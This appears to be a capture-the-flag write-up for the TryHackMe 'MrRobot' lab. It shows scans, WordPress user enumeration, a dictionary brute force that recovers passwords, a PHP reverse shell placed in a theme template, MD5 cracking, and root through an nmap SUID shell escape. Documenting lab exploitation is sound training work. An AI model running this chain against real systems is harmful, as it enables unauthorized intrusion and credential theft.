# CTF TryHackMe - MrRobot

## Nmap

```bash
nmap -sC -sV -oN nmap.log 10.10.201.233
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-21 18:41 CET
Nmap scan report for 10.10.201.233
Host is up (0.10s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.57 seconds
```

## Check the website

We got an wordpress web site on http://10.10.201.233/0/

let's run an wp-scan

```bash
wpscan --url http://10.10.201.233/0 --wp-content-dir /
_______________________________________________________________ 
         __          _______   _____               
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ Â®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
                           
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://10.10.201.233/0/ [10.10.201.233]
[+] Started: Fri Jan 21 18:54:31 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Powered-By: PHP/5.5.29
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection) 
 | Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.201.233/xmlrpc.php | Found By: Headers (Passive Detection)   
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.201.233/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>
 |  - http://10.10.201.233/comments/feed/, <generator>http://wordpress.org/?v=4.3.1</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://10.10.201.233/themes/twentyfifteen/ 
 | Last Updated: 2021-07-22T00:00:00.000Z                           
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://10.10.201.233/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... 
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.201.233/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:02:28 <===============================================================================================================================================================> (137 / 137) 100.00% Time: 00:02:28

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jan 21 18:59:18 2022
[+] Requests Done: 169
[+] Cached Requests: 9
[+] Data Sent: 35.266 KB
[+] Data Received: 216.183 KB
[+] Memory used: 214.762 MB
[+] Elapsed time: 00:04:46
```

Now, trying to enumerate user 

```bash
wpscan --url http://10.10.201.233/0 --wp-content-dir / --enumerate u
[..SNIP..]
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:27 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:27

[i] User(s) Identified:

[+] mich05654
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] elliot
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
```

We got 2 valid users :

```
mich05654
elliot
```

Lets brute force, we discover on **http://10.10.201.233/robots.txt** a wordlist. Using it for bruteforce attack:

```bash
wpscan --url http://10.10.201.233/0 --wp-content-dir / --passwords fsocity.dic
[..SNIP]
[SUCCESS] - mich05654 / Dylan_2791
[SUCCESS] - elliot / ER28-0652
```

Cool, we can try to login with these creds.
mich05654 isn't administrator. But elliot is.

## Wordpress ReverseShell

Let's reverse shell

Go to :

```
Appearence > editor > 404 template

Edit with a php reverse shell and upload. Then start nc listener, and go to http://10.10.144.20/wp-content/themes/twentyfifteen/404.php
```

Yeahh we'rr in

Then go to **/home/robot** and we can see 

```bash
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```

Go to crackstation to decrypt this md5 hash : 

```
abcdefghijklmnopqrstuvwxyz
```

We can try to login to robot user with this password

```bash
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$
```

## PrivEsc

Let's try to privesc to get root. First listing sudo permissions and suid.

```bash
robot@linux:~$ sudo -l
sudo -l
[sudo] password for robot: abcdefghijklmnopqrstuvwxyz

Sorry, user robot may not run sudo on linux.
robot@linux:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
```

We can abuse to **nmap suid**

```bash
robot@linux:~$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
```

Annnnd we'rrr root ! :D
